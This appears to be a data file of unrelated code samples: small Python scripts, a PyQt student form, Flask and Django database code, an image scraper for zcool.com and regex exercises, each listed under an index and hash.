#for epoch, score in all_time_best:
#print 'At: ', epoch, ', best score: ', score
|
10,585 | 4adedc5898d0a564fe8f496534bad29146607fd4 | #Given a string, print the string capitalized.
string = raw_input("what's the string?")
string_cap = string.capitalize()
print string_cap
|
10,586 | 6dad01f9b94866a2ec394208eec8cbffcbc563f3 | import sys
from PyQt5.QtWidgets import QApplication , QWidget, QPushButton, QTableWidgetItem
from PyQt5.QtGui import QIcon
from PyQt5.QtCore import pyqtSlot
from PyQt5.QtWidgets import QHBoxLayout, QGroupBox , QDialog, QVBoxLayout, QGridLayout
from PyQt5.QtWidgets import QLabel, QTextEdit
from PyQt5.QtWidgets import QMessageBox
from PyQt5.QtWidgets import QFormLayout, QLineEdit
from PyQt5.QtWidgets import QSizePolicy, QMainWindow
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
import matplotlib.pyplot as plt
from PyQt5.QtCore import Qt
from validator.StudentValidator import StudentValidator
from dao.StudentDAOSqliteImpl import StudentDAOSqliteImpl
from model.Student import Student
class StudentSaveWindow(QDialog):
"""
With this class QDialog for adding new model.Student into database is shown.
"""
def __init__(self, tableWidget):
"""
constructor
:param tableWidget: QTableWidget
"""
super().__init__()
self.tableWidget = tableWidget
self.title = "Save New Student"
self.left , self.top , self.width , self.height = 10, 10, 500, 500
self.validator = StudentValidator()
self.dao = StudentDAOSqliteImpl()
self.initGUI()
def initGUI(self):
"""
initializes GUI
:return:
"""
self.setWindowTitle(self.title)
self.setGeometry(self.left , self.top, self.width , self.height)
self.setWindowModality(Qt.ApplicationModal)
self.addComponents()
self.registerEvents()
def addComponents(self):
"""
sets the mainLayout for this class and adds components into it.
:return:
"""
self.mainLayout = QFormLayout()
self.setLayout(self.mainLayout)
# title
self.lblTitle = QLabel("Save New Student")
self.lblEmpty = QLabel()
# enrolmentNumber
self.lblEnrolmentNumber = QLabel("EnrolmentNumber: ")
self.editEnrolmentNumber = QLineEdit()
# firstName
self.lblFirstName = QLabel("FirstName: ")
self.editFirstName = QLineEdit()
# lastName
self.lblLastName = QLabel("LastName: ")
self.editLastName = QLineEdit()
# dob
self.lblDob = QLabel("DateOfBirth: ")
self.editDob = QLineEdit()
# faculty
self.lblFaculty = QLabel("Faculty: ")
self.editFaculty = QLineEdit()
# email
self.lblEmail = QLabel("Email: ")
self.editEmail = QLineEdit()
# buttons
self.btnSave = QPushButton("Save")
self.btnCancel = QPushButton("Cancel")
# add all rows to mainLayout
self.mainLayout.addRow(self.lblEmpty, self.lblTitle)
self.mainLayout.addRow(self.lblEnrolmentNumber, self.editEnrolmentNumber)
self.mainLayout.addRow(self.lblFirstName, self.editFirstName)
self.mainLayout.addRow(self.lblLastName, self.editLastName)
self.mainLayout.addRow(self.lblDob, self.editDob)
self.mainLayout.addRow(self.lblFaculty, self.editFaculty)
self.mainLayout.addRow(self.lblEmail, self.editEmail)
self.mainLayout.addRow(self.btnSave, self.btnCancel)
def registerEvents(self):
"""
registers events
:return:
"""
self.btnSave.clicked.connect(self.onBtnSaveClicked)
self.btnCancel.clicked.connect(self.onBtnCancelClicked)
@pyqtSlot()
def onBtnSaveClicked(self):
"""
Slot for signal-slot handling .
Gets invoked when btnSave is clicked.
:return:
"""
try:
errors = []
enrolmentNumber = self.editEnrolmentNumber.text()
firstName = self.editFirstName.text()
lastName = self.editLastName.text()
dob = self.editDob.text()
faculty = self.editFaculty.text()
email = self.editEmail.text()
if not self.validator.validateEnrolmentNumber(enrolmentNumber):
errors.append("enrolmentNumber is incorrect.")
if not self.validator.validateFirstName(firstName):
errors.append("firstName is incorrect.")
if not self.validator.validateLastName(lastName):
errors.append("lastName is incorrect.")
if not self.validator.validateDob(dob):
errors.append("DateOfBirth is incorrect.")
if not self.validator.validateFaculty(faculty):
errors.append("Faculty is incorrect.")
if not self.validator.validateEmail(email):
errors.append("Email is incorrect.")
if len(errors) > 0 :
raise Exception("\n".join(errors))
ret = self.dao.save(Student(enrolmentNumber, firstName, lastName,
dob, faculty, email))
if ret :
raise Exception(ret)
rowPosition = self.tableWidget.rowCount()
self.tableWidget.insertRow(rowPosition)
self.tableWidget.setItem(rowPosition, 0, QTableWidgetItem(enrolmentNumber))
self.tableWidget.setItem(rowPosition, 1, QTableWidgetItem(firstName))
self.tableWidget.setItem(rowPosition, 2, QTableWidgetItem(lastName))
self.tableWidget.setItem(rowPosition, 3, QTableWidgetItem(dob))
self.tableWidget.setItem(rowPosition, 4, QTableWidgetItem(faculty))
self.tableWidget.setItem(rowPosition, 5, QTableWidgetItem(email))
self.close()
except Exception as err:
QMessageBox.critical(self, "<<Error>>", str(err))
@pyqtSlot()
def onBtnCancelClicked(self):
"""
Slot for signal-slot handling .
Gets invoked when btnCancel is clicked.
:return:
"""
self.close()
|
10,587 | 9beb996d4106e806f2cee8c0ee62faf28161a240 | import spacy
from spacy.tokens import Doc
from SubjectObjectExtractor import SubjectObjectExtractor
nlp = spacy.load("en_core_web_md")
pipeline_component = SubjectObjectExtractor(nlp)
pipeline_component.adj_as_object = True
Doc.set_extension('svos', default=None)
nlp.add_pipe(pipeline_component, last=True)
file = open('test_text.txt', 'r')
i = 1
for line in file:
print(i, line, end='')
if not line.startswith('#'):
doc = nlp(line)
for svo in doc._.svos:
print(' ', svo)
i += 1
|
10,588 | 68b3754e602e5128448738bde8ebf35492b15455 | class Store:
_name = None
_realised = 0
_realisedsumm = 0
def __init__(self, name,):
self._name = name
def set_name(self, name):
self._name = name
def get_name(self):
return self._name
def set_realised(self, realised):
self._realised = realised
def get_realised(self):
return self._realised
def sell(self):
self._realised +=1
Store._realisedsumm += 1
def seesumm(self):
print(format.self._realised)
print(self.get_realisedsumm)
metro = Store("METPO")
metro.sell()
metro.seesumm()
ashan = Store("ASHAN")
ashan.sell()
ashan.seesumm()
|
10,589 | b732b2ccfa7393e748a570626c6b236cfa70c938 | import cv2
def correlation(img):
(img_B, img_G, img_R) = cv2.split(img)
for i in range(1, 11):
img = cv2.imread(str(i) + ".jpg", cv2.IMREAD_COLOR)
img = cv2.resize(img, dsize=(128, 128), interpolation=cv2.INTER_AREA)
cv2.imshow("1", img)
cv2.waitKey(0)
|
10,590 | 8c4f2ecfbc1fed057c65534003e3e3a63acfbd46 | #coding; utf-8
import urllib
import utility
def get_problem(id, status=None):
url = "http://judge.u-aizu.ac.jp/onlinejudge/webservice/problem";
pram = {"id": "%04d" % id};
if (status):
pram["status"] = status;
pram_str = urllib.urlencode(pram);
print pram_str
return (utility.xml2dict(urllib.urlopen(url + "?" + pram_str).read()));
def get_solved_record(**kwargs):
url = "http://judge.u-aizu.ac.jp/onlinejudge/webservice/solved_record";
pram = kwargs;
pram_str = urllib.urlencode(pram);
return (utility.xml2dict(urllib.urlopen(url + "?" + pram_str).read()));
def get_status_log(**kwargs):
url = "http://judge.u-aizu.ac.jp/onlinejudge/webservice/status_log";
pram = kwargs;
pram["problem_id"] = "%04d" % pram["problem_id"];
pram_str = urllib.urlencode(pram);
return (utility.xml2dict(urllib.urlopen(url + "?" + pram_str).read()));
if __name__ == "__main__":
print get_solved_record(user_id="harekumo");
print get_status_log(problem_id=0);
|
10,591 | ba77d62b4812b676e0d2227f0327e176ed6c9263 | op1=int(input('첫번째 수 입력:'))
op2=int(input('두번째 수 입력:'))
print(op1,'+',op2,'=',(op1+op2))
print(op1,'-',op2,'=',(op1-op2))
print(op1,'*',op2,'=',(op1*op2))
print(op1,'/',op2,'=',(op1/op2))
|
10,592 | d2de10264c96e44403a1c30d44d6d4b227f754ee | from django.core.exceptions import ObjectDoesNotExist
from django.core.management.base import NoArgsCommand
from django.utils.html import strip_tags
from datetime import time
import MySQLdb
from program.models import Show, Schedule, RRule
USER = 'helsinki'
PASSWD = 'helsinki'
DB = 'helsinki'
RRULES = {
0: RRule.objects.get(pk=1),
7: RRule.objects.get(pk=3),
14: RRule.objects.get(pk=4),
28: RRule.objects.get(pk=5)
}
class Command(NoArgsCommand):
help = 'Import schedules from the current program'
def handle_noargs(self, **options):
connection = MySQLdb.connect(user=USER, passwd=PASSWD, db=DB)
cursor = connection.cursor()
cursor.execute("""SELECT titel, beginn, ende, erster_termin, letzter_termin, rhytmus, termin
FROM sendungen
WHERE letzter_termin > current_date AND titel NOT LIKE 'Musikprogramm' AND titel NOT LIKE '%%(Wiederholung)'""")
counter = 0
for titel, beginn, ende, erster_termin, letzter_termin, rhytmus, termin in cursor.fetchall():
titel = strip_tags(titel)
hours, seconds = divmod(beginn.seconds, 3600)
minutes, seconds = divmod(seconds, 60)
tstart = time(hour=hours, minute=minutes, second=seconds)
hours, seconds = divmod(ende.seconds, 3600)
minutes, seconds = divmod(seconds, 60)
tend = time(hour=hours, minute=minutes, second=seconds)
try:
rrule = RRULES[rhytmus]
try:
show = Show.objects.get(name=titel)
except ObjectDoesNotExist:
print 'show with name "%s" not found' % titel
else:
schedule = Schedule(rrule=rrule, byweekday=termin, show=show, dstart=erster_termin,
tstart=tstart, tend=tend, until=letzter_termin)
try:
schedule.save()
counter += 1
except:
pass
except KeyError:
print 'rhythmus "%i" is not supported for sendung "%s"' % (rhytmus, titel)
cursor.execute("""SELECT titel, beginn, ende, erster_termin, letzter_termin, rhytmus, termin
FROM sendungen
WHERE letzter_termin > current_date AND titel LIKE '%%(Wiederholung)'""")
for titel, beginn, ende, erster_termin, letzter_termin, rhytmus, termin in cursor.fetchall():
titel = strip_tags(titel[:-15])
hours, seconds = divmod(beginn.seconds, 3600)
minutes, seconds = divmod(seconds, 60)
tstart = time(hour=hours, minute=minutes, second=seconds)
hours, seconds = divmod(ende.seconds, 3600)
minutes, seconds = divmod(seconds, 60)
tend = time(hour=hours, minute=minutes, second=seconds)
try:
rrule = RRULES[rhytmus]
try:
show = Show.objects.get(name=titel)
except ObjectDoesNotExist:
print 'show with name "%s" not found' % titel
else:
schedule = Schedule(rrule=rrule, byweekday=termin, show=show, dstart=erster_termin,
tstart=tstart, tend=tend, until=letzter_termin, is_repetition=True)
try:
schedule.save()
counter += 1
except:
pass
except KeyError:
print 'rhythmus "%i" is not supported for sendung "%s"' % (rhytmus, titel)
cursor.close()
connection.close()
print '%i schedules imported' % counter |
10,593 | fc04a89c4e21f90d0b6c52271424310c42a7ac0c | from flask import Blueprint, request, jsonify, make_response
from database.db import mongo
from bson import ObjectId
# create the blueprint to be registered in app.py
user = Blueprint("user", __name__)
@user.route("/api/user", methods=["POST"])
def create_user():
# user = {"name": "John Smith", "age": 48, "address": "123 Bond Street"}
user_json = request.get_json()
user = {
"name": user_json.get("name"),
"age": user_json.get("age"),
"address": user_json.get("address"),
}
post = mongo.db.users.insert_one(user)
if post:
return make_response(str(post.inserted_id), 201)
else:
return make_response("An error occurred when adding the new plan", 500)
@user.route("/api/user", methods=["GET"])
def get_all_users():
user_list = mongo.db.users.find()
data_to_return = []
for user in user_list:
data_to_return.append(
{
"id": str(user.get("_id")),
"name": user.get("name"),
"age": user.get("age"),
"address": user.get("address"),
}
)
return make_response(jsonify(data_to_return, 200))
@user.route("/api/user/<string:user_id>", methods=["DELETE"])
def delete_user(user_id):
result = mongo.db.users.delete_one({"_id": ObjectId(user_id)})
if result.deleted_count == 1:
return {}, 204
else:
return "No user found with this ID", 404
|
10,594 | 120f524168c1a648b054a421d3f7ac77d8070ad1 | # @Author: lonsty
# @Date: 2019-09-07 18:34:18
import json
import math
import os.path as op
import re
import sys
import threading
import time
from collections import namedtuple
from concurrent.futures import ThreadPoolExecutor, as_completed, wait
from datetime import datetime
from pathlib import Path
from queue import Empty, Queue
from typing import List
from urllib.parse import urljoin, urlparse
from uuid import uuid4
import requests
from bs4 import BeautifulSoup
from termcolor import colored, cprint
from zcooldl.utils import (mkdirs_if_not_exist, retry, safe_filename,
sort_records)
Scrapy = namedtuple('Scrapy', 'type author title objid index url') # 用于记录下载任务
HEADERS = {
'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 '
'(KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36'
}
HOST_PAGE = 'https://www.zcool.com.cn'
SEARCH_DESIGNER_SUFFIX = '/search/designer?&word={word}'
USER_SUFFIX = '/u/{id}'
PAGE_SUFFIX = '?myCate=0&sort=1&p={page}'
WORK_SUFFIX = '/work/content/show?p=1&objectId={objid}'
COLLECTION_SUFFIX = '/collection/contents?id={objid}&p={page}&pageSize=25'
USER_API = 'https://www.zcool.com.cn/member/card/{id}'
TIMEOUT = 30
Q_TIMEOUT = 1
MAX_WORKERS = 20
RETRIES = 3
thread_local = threading.local()
def get_session():
"""使线程获取同一个 Session,可减少 TCP 连接数,加速请求。
:return requests.Session: session
"""
if not hasattr(thread_local, "session"):
thread_local.session = requests.Session()
return thread_local.session
@retry(Exception, tries=RETRIES)
def session_request(url: str, method: str = 'GET') -> requests.Response:
"""使用 session 请求数据。使用了装饰器 retry,在网络异常导致错误时会重试。
:param str url: 目标请求 URL
:param str method: 请求方式
:return requests.Response: 响应数据
"""
resp = get_session().request(method, url, headers=HEADERS, timeout=TIMEOUT)
resp.raise_for_status()
return resp
class ZCoolScraper():
def __init__(self, user_id=None, username=None, collection=None, destination=None,
max_pages=None, spec_topics=None, max_topics=None, max_workers=None,
retries=None, redownload=None, overwrite=False, thumbnail=False):
"""初始化下载参数。
:param int user_id: 用户 ID
:param str username: 用户名
:param HttpUrl collection: 收藏集 URL
:param str destination: 图片保存到本地的路径,默认当前路径
:param int max_pages: 最大爬取页数,默认所有
:param list spec_topics: 需要下载的特定主题
:param int max_topics: 最大下载主题数量,默认所有
:param int max_workers: 线程开启个数,默认 20
:param int retries: 请求异常时的重试次数,默认 3
:param str redownload: 下载记录文件,给定此文件则从失败记录进行下载
:param bool overwrite: 是否覆盖已存在的文件,默认 False
:param bool thumbnail: 是否下载缩略图,默认 False
"""
self.start_time = datetime.now()
print(f' - - - - - -+-+ {self.start_time.ctime()} +-+- - - - - -\n')
self.collection = collection
self.spec_topics = spec_topics
self.max_topics = max_topics or 'all'
self.max_workers = max_workers or MAX_WORKERS
self.pool = ThreadPoolExecutor(self.max_workers)
self.overwrite = overwrite
self.thumbnail = thumbnail
self.pages = Queue()
self.topics = Queue()
self.images = Queue()
self.stat = {
'npages': 0,
'ntopics': 0,
'nimages': 0,
'pages_pass': set(),
'pages_fail': set(),
'topics_pass': set(),
'topics_fail': set(),
'images_pass': set(),
'images_fail': set()
}
if retries:
# 重置全局变量 RETRIES
global RETRIES
RETRIES = retries
dest = Path(destination or '', urlparse(HOST_PAGE).netloc)
# 从记录文件中的失败项开始下载
if redownload:
self.username = self.reload_records(redownload)
self.user_id = self.search_id_by_username(self.username)
self.max_pages = self.pages.qsize()
self.max_topics = self.topics.qsize()
self.directory = dest / safe_filename(self.username)
self.stat.update({
'npages': self.max_pages,
'ntopics': self.max_topics,
'nimages': self.images.qsize()
})
print(f'{"Username".rjust(17)}: {colored(self.username, "cyan")}\n'
f'{"User ID".rjust(17)}: {self.user_id}\n'
f'{"Pages to scrapy".rjust(17)}: {self.max_pages:2d}\n'
f'{"Topics to scrapy".rjust(17)}: {self.max_topics:3d}\n'
f'{"Images to scrapy".rjust(17)}: {self.images.qsize():4d}\n'
f'Storage directory: {colored(self.directory, attrs=["underline"])}', end='\n\n')
self.fetch_all(initialized=True)
return
# 从收藏集下载
if collection:
objid = self.parse_objid(collection, is_collection=True)
resp = session_request(urljoin(HOST_PAGE, COLLECTION_SUFFIX.format(objid=objid, page=1)))
data = resp.json().get('data', {})
total = data.get('total', 0)
page_size = data.get('pageable', {}).get('pageSize')
max_pages_ = math.ceil(total / page_size)
self.max_pages = min(max_pages or 9999, max_pages_)
self.directory = dest / safe_filename(f'{self.username}-{self._collection_name}')
self.parse_collection_topics(data.get('content'))
# 解析第 2 页 至 最大页的 topic 到下载任务
for page in range(2, self.max_pages + 1):
resp = session_request(urljoin(HOST_PAGE, COLLECTION_SUFFIX.format(objid=objid, page=page)))
self.parse_collection_topics(topics=resp.json().get('data', {}).get('content'),
offset=page_size * (page - 1))
# 根据用户 ID 或用户名下载
else:
self.user_id = user_id or self.search_id_by_username(username)
self.base_url = urljoin(HOST_PAGE, USER_SUFFIX.format(id=self.user_id))
try:
response = session_request(self.base_url)
except requests.exceptions.ProxyError:
cprint('Cannot connect to proxy.', 'red')
sys.exit(1)
except Exception as e:
cprint(f'Failed to connect to {self.base_url}, {e}', 'red')
sys.exit(1)
soup = BeautifulSoup(markup=response.text, features='html.parser')
try:
author = soup.find(name='div', id='body').get('data-name')
if username and username != author:
cprint(f'Invalid user id:「{user_id}」or username:「{username}」!', 'red')
sys.exit(1)
self.username = author
except Exception:
self.username = username or 'anonymous'
self.directory = dest / safe_filename(self.username)
try:
max_pages_ = int(soup.find(id='laypage_0').find_all(name='a')[-2].text)
except Exception:
max_pages_ = 1
self.max_pages = min(max_pages or 9999, max_pages_)
if self.spec_topics:
topics = ', '.join(self.spec_topics)
elif self.max_topics == 'all':
topics = 'all'
else:
topics = self.max_pages * self.max_topics
print(f'{"Username".rjust(17)}: {colored(self.username, "cyan")}\n'
f'{"User ID".rjust(17)}: {self.user_id}\n'
f'{"Maximum pages".rjust(17)}: {max_pages_}\n'
f'{"Pages to scrapy".rjust(17)}: {self.max_pages}\n'
f'{"Topics to scrapy".rjust(17)}: {topics}\n'
f'Storage directory: {colored(self.directory, attrs=["underline"])}', end='\n\n')
self.END_PARSING_TOPICS = False
self.fetch_all(initialized=True if self.collection else False)
def search_id_by_username(self, username):
"""通过用户昵称查找用户 ID。
:param str username: 用户昵称
:return int: 用户 ID
"""
if not username:
cprint('Must give an <user id> or <username>!', 'yellow')
sys.exit(1)
search_url = urljoin(HOST_PAGE, SEARCH_DESIGNER_SUFFIX.format(word=username))
try:
response = session_request(search_url)
except requests.exceptions.ProxyError:
cprint('Cannot connect to proxy.', 'red')
sys.exit(1)
except Exception as e:
cprint(f'Failed to connect to {search_url}, {e}', 'red')
sys.exit(1)
author_1st = BeautifulSoup(response.text, 'html.parser').find(name='div', class_='author-info')
if (not author_1st) or (author_1st.get('data-name') != username):
cprint(f'Username「{username}」does not exist!', 'yellow')
sys.exit(1)
return author_1st.get('data-id')
def reload_records(self, file):
"""从本地下载记录里读取下载失败的内容。
:param str file: 下载记录文件的路径。
:return str: 用户名
"""
with open(file, 'r', encoding='utf-8') as f:
for fail in json.loads(f.read()).get('fail'):
scrapy = Scrapy._make(fail.values())
if scrapy.type == 'page':
self.pages.put(scrapy)
elif scrapy.type == 'topic':
self.topics.put(scrapy)
elif scrapy.type == 'image':
self.images.put(scrapy)
return scrapy.author
def generate_pages(self):
"""根据最大下载页数,生成需要爬取主页的任务。"""
for page in range(1, self.max_pages + 1):
suffix = COLLECTION_SUFFIX if self.collection else PAGE_SUFFIX
url = urljoin(self.base_url, suffix.format(page=page))
scrapy = Scrapy(type='page', author=self.username, title=page,
objid=None, index=page - 1, url=url)
if scrapy not in self.stat["pages_pass"]:
self.pages.put(scrapy)
def parse_collection_topics(self, topics: List[dict], offset: int = 0):
for idx, topic in enumerate(topics):
new_scrapy = Scrapy(type='topic',
author=topic.get('creatorObj', {}).get('username'),
title=topic.get('title'),
objid=topic.get('id'),
index=offset + idx,
url=topic.get('pageUrl'))
if new_scrapy not in self.stat["topics_pass"]:
self.topics.put(new_scrapy)
self.stat["ntopics"] += 1
def parse_topics(self, scrapy):
"""爬取主页,解析所有 topic,并将爬取主题的任务添加到任务队列。
:param scrapy: 记录任务信息的数据体
:return Scrapy: 记录任务信息的数据体
"""
resp = session_request(scrapy.url)
cards = BeautifulSoup(resp.text, 'html.parser').find_all(name='a', class_='card-img-hover')
for idx, card in enumerate(cards if self.max_topics == 'all' else cards[:self.max_topics + 1]):
title = card.get('title')
if self.spec_topics and (title not in self.spec_topics):
continue
new_scrapy = Scrapy(type='topic', author=scrapy.author, title=title,
objid=None, index=idx, url=card.get('href'))
if new_scrapy not in self.stat["topics_pass"]:
self.topics.put(new_scrapy)
self.stat["ntopics"] += 1
return scrapy
def fetch_topics(self):
"""从任务队列中获取要爬取的主页,使用多线程处理得到需要爬取的主题。"""
page_futures = {}
while True:
try:
scrapy = self.pages.get(timeout=Q_TIMEOUT)
page_futures[self.pool.submit(self.parse_topics, scrapy)] = scrapy
except Empty:
break
except Exception:
continue
for future in as_completed(page_futures):
scrapy = page_futures.get(future)
try:
future.result()
self.stat["pages_pass"].add(scrapy)
except Exception:
self.stat["pages_fail"].add(scrapy)
cprint(f'GET page: {scrapy.title} ({scrapy.url}) failed.', 'red')
self.END_PARSING_TOPICS = True
def parse_objid(self, url: str, is_collection: bool = False) -> str:
"""根据 topic 页面解析 objid
:param url: topic 或 collection 的 URL
:return: objid
"""
soup = BeautifulSoup(session_request(url).text, 'html.parser')
objid = soup.find('input', id='dataInput').attrs.get('data-objid')
if is_collection:
self._collection_name = soup.find('h2', class_='title-h2').text
user = soup.find(name='span', class_='details-user-avatar')
self.user_id = user.find('div').attrs.get('data-id')
self.username = user.find('a').attrs.get('title')
return objid
def parse_images(self, scrapy):
"""爬取 topic,获得 objid 后直接调用 API,从返回数据里获得图片地址等信息,
并将下载图片的任务添加到任务队列。
:param scrapy: 记录任务信息的数据体
:return Scrapy: 记录任务信息的数据体
"""
objid = scrapy.objid or self.parse_objid(scrapy.url)
resp = session_request(urljoin(HOST_PAGE, WORK_SUFFIX.format(objid=objid)))
data = resp.json().get('data', {})
author = data.get('product', {}).get('creatorObj', {}).get('username')
title = data.get('product', {}).get('title')
objid = data.get('product', {}).get('id')
for img in data.get('allImageList', []):
new_scrapy = Scrapy(type='image', author=author, title=title,
objid=objid, index=img.get('orderNo') or 0, url=img.get('url'))
if new_scrapy not in self.stat["images_pass"]:
self.images.put(new_scrapy)
self.stat["nimages"] += 1
return scrapy
def fetch_images(self):
"""从任务队列中获取要爬取的主题,使用多线程处理得到需要下载的图片。"""
image_futures = {}
while True:
try:
scrapy = self.topics.get(timeout=Q_TIMEOUT)
image_futures[self.pool.submit(self.parse_images, scrapy)] = scrapy
except Empty:
if self.END_PARSING_TOPICS:
break
except Exception:
continue
for future in as_completed(image_futures):
scrapy = image_futures.get(future)
try:
future.result()
self.stat["topics_pass"].add(scrapy)
except Exception:
self.stat["topics_fail"].add(scrapy)
cprint(f'GET topic: {scrapy.title} ({scrapy.url}) failed.', 'red')
def fetch_all(self, initialized: bool = False):
"""同时爬取主页、主题,并更新状态。"""
if not initialized:
self.generate_pages()
fetch_futures = [self.pool.submit(self.fetch_topics),
self.pool.submit(self.fetch_images)]
end_show_fetch = False
t = threading.Thread(target=self.show_fetch_status, kwargs={'end': lambda: end_show_fetch})
t.start()
try:
wait(fetch_futures)
except KeyboardInterrupt:
raise
finally:
end_show_fetch = True
t.join()
def show_fetch_status(self, interval=0.5, end=None):
"""用于后台线程,实现边爬取边显示状态。
:param int interval: 状态更新间隔,秒
:param function end: 用于控制退出线程
"""
while True:
status = 'Fetched Pages: {pages}\tTopics: {topics}\tImages: {images}'.format(
pages=colored(str(self.max_pages).rjust(3), 'blue'),
topics=colored(str(self.stat["ntopics"]).rjust(3), 'blue'),
images=colored(str(self.stat["nimages"]).rjust(5), 'blue'))
print(status, end='\r', flush=True)
if (interval == 0) or (end and end()):
print('\n')
break
time.sleep(interval)
def show_download_status(self, interval=0.5, end=None):
"""用于后台线程,实现边下载边显示状态。
:param int interval: 状态更新间隔,秒
:param function end: 用于控制退出线程
"""
while True:
completed = len(self.stat["images_pass"]) + len(self.stat["images_fail"])
if self.stat["nimages"] > 0:
status = 'Time used: {time_used}\tFailed: {failed}\tCompleted: {completed}'.format(
time_used=colored(str(datetime.now() - self.start_time)[:-7], 'yellow'),
failed=colored(str(len(self.stat["images_fail"])).rjust(3), 'red'),
completed=colored(str(int(completed / self.stat["nimages"] * 100))
+ f'% ({completed}/{self.stat["nimages"]})', 'green'))
print(status, end='\r', flush=True)
if (interval == 0) or (end and end()):
if self.stat["nimages"] > 0:
print('\n')
break
time.sleep(interval)
def download_image(self, scrapy):
"""下载图片保存到本地。
:param scrapy: 记录任务信息的数据体
:return Scrapy: 记录任务信息的数据体
"""
try:
name = re.findall(r'(?<=/)\w*?\.(?:jpg|gif|png|bmp)', scrapy.url, re.IGNORECASE)[0]
except IndexError:
name = uuid4().hex + '.jpg'
path = self.directory / safe_filename(scrapy.title)
filename = path / f'[{scrapy.index + 1 or 0:02d}]{name}'
if (not self.overwrite) and op.isfile(filename):
return scrapy
url = scrapy.url
if self.thumbnail:
if url.lower().endswith(('jpg', 'png', 'bmp')):
url = f'{scrapy.url}@1280w_1l_2o_100sh.{url[-3:]}'
resp = session_request(url)
mkdirs_if_not_exist(path)
with open(filename, 'wb') as f:
for chunk in resp.iter_content(8192):
f.write(chunk)
return scrapy
def save_records(self):
"""将成功及失败的下载记录保存到本地文件。
:return str: 记录文件的路径
"""
filename = f'{safe_filename(self.start_time.isoformat()[:-7])}.json'
abspath = op.abspath(self.directory / filename)
with open(abspath, 'w', encoding='utf-8') as f:
success = (self.stat["pages_pass"] | self.stat["topics_pass"] | self.stat["images_pass"])
fail = (self.stat["pages_fail"] | self.stat["topics_fail"] | self.stat["images_fail"])
type_order = {'page': 1, 'topic': 2, 'image': 3}
s_ordered = sort_records(success, order=type_order)
f_ordered = sort_records(fail, order=type_order)
records = {
'time': self.start_time.isoformat(),
'success': [scrapy._asdict() for scrapy in s_ordered],
'fail': [scrapy._asdict() for scrapy in f_ordered]
}
f.write(json.dumps(records, ensure_ascii=False, indent=2))
return abspath
def run_scraper(self):
"""使用多线程下载所有图片,完成后保存记录并退出程序。"""
end_show_download = False
t = threading.Thread(target=self.show_download_status, kwargs={'end': lambda: end_show_download})
t.start()
image_futuress = {}
while True:
try:
scrapy = self.images.get_nowait()
if scrapy not in self.stat["images_pass"]:
image_futuress[self.pool.submit(self.download_image, scrapy)] = scrapy
except Empty:
break
except KeyboardInterrupt:
raise
except Exception:
continue
try:
for future in as_completed(image_futuress):
scrapy = image_futuress.get(future)
try:
future.result()
self.stat["images_pass"].add(scrapy)
except Exception:
self.stat["images_fail"].add(scrapy)
cprint(f'Download image: {scrapy.title}[{scrapy.index + 1}] '
f'({scrapy.url}) failed.', 'red')
except KeyboardInterrupt:
raise
finally:
end_show_download = True
t.join()
saved_images = len(self.stat["images_pass"])
failed_images = len(self.stat["images_fail"])
if saved_images or failed_images:
if saved_images:
print(f'Saved {colored(saved_images, "green")} images to '
f'{colored(self.directory.absolute(), attrs=["underline"])}')
records_path = self.save_records()
print(f'Saved records to {colored(records_path, attrs=["underline"])}')
else:
cprint('No images to download.', 'yellow')
|
10,595 | 89dddd59f164d8697cd913091625124f738117cd | import re
import urllib.request
string="Michael is my M 30 year old son and lives with his wife Jess who is 25 years old.They have a joint account worth $125000"
ages=re.findall(r'\d{1,3}',string)
names=re.findall(r'[A-Z][a-z]*',string) # looking for strings with a beginning capital letter
#followed by 0 or more small letters
print(ages,names)
print(re.findall(r'[$]\d*',string))
# use of iterator This finds the first and last index of the occurence of the string we
#are looking for eg, this prints the first and last indices of occurrences of inform
str="We need to inform him about the latest received information"
for i in re.finditer("inform",str):
print(i.span())
print(str[11:17])
# s="sat,hat,mat,pat"
# print(re.findall(r'[^h-m]at',s)) this prints anything outside the given range thus, sat and pat
#REPLACE A STRING
items="rome persia greece beijing berlin"
out=re.compile("beijing") #item to be replaced
items=out.sub("Nairobi",items) #new string
print(items)
# phone number verification
num="+254726700973,254705410,0726784166,07234119"
re1="[07]\d{9}"
re2="[+2547]\d{12}"
kenyan_phone_num=re.findall(r"(%s|%s)"%(re1,re2),num)
if(kenyan_phone_num):
print(kenyan_phone_num)
# email verification
emails="sk@gmail.com @gmail.com custom@comp.co.ke dc@.com kk2b@g.com "
print(re.findall(r'[\w.%+-]{1,20}@[A-Za-z]{2,20}.[A-Za-z]{2,3}| [\w.%+-]{1,20}@[A-Za-z]{2,20}.[A-Za-z]{2,3}.[A-Za-z]{2}',emails))
#simple web parsing
url="http://www.summet.com/dmsi/html/codesamples/addresses.html"
response=urllib.request.urlopen(url)
html=response.read()
html_str=html.decode()
phone_data=re.findall(r'\(\d{3}\) \d{3}-\d{4}',html_str)
# the brackets are preceeded by back-slashes for escaping them. ie, they arent special
#characters but part of the pattern
for i in phone_data:
print(i)
# from a file
text=open('poem.txt')
for line in text:
line=line.rstrip()# to remove the newline character(\n)
if re.search(r'[A-Z]{8,}',line):
print(line)
s='127.0.0.1/blog 748596/blog/hello'
print(re.findall(r'blog[^\s]',s)) # if the carrat sign is included in the range brackets,
# the regex looks for anything apart from what is specified in the regex
# when used outside the range, it means 'match the beggining of a line'
#eg, only give me words that dont start with capital letters.
#^[^A_Z] |
10,596 | fa6096641c65844e940b16f49852aef0fb748e28 | from __future__ import absolute_import
from __future__ import print_function
from ..Block import Block
class RDBPhysicalDrive:
def __init__(self, cyls=0, heads=0, secs=0,
interleave=1, parking_zone=-1, write_pre_comp=-1, reduced_write=-1, step_rate=3):
if parking_zone == -1:
parking_zone = cyls
if write_pre_comp == -1:
write_pre_comp = cyls
if reduced_write == -1:
reduced_write = cyls
self.cyls = cyls
self.heads = heads
self.secs = secs
self.interleave = interleave
self.parking_zone = parking_zone
self.write_pre_comp = write_pre_comp
self.reduced_write = reduced_write
self.step_rate = step_rate
def dump(self):
print("PhysicalDrive")
print(" cyls: %d" % self.cyls)
print(" heads: %d" % self.heads)
print(" secs: %d" % self.secs)
print(" interleave: %d" % self.interleave)
print(" parking_zone: %d" % self.parking_zone)
print(" write_pre_comp: %d" % self.write_pre_comp)
print(" reduced_write: %d" % self.reduced_write)
print(" step_rate: %d" % self.step_rate)
def read(self, blk):
self.cyls = blk._get_long(16)
self.secs = blk._get_long(17)
self.heads = blk._get_long(18)
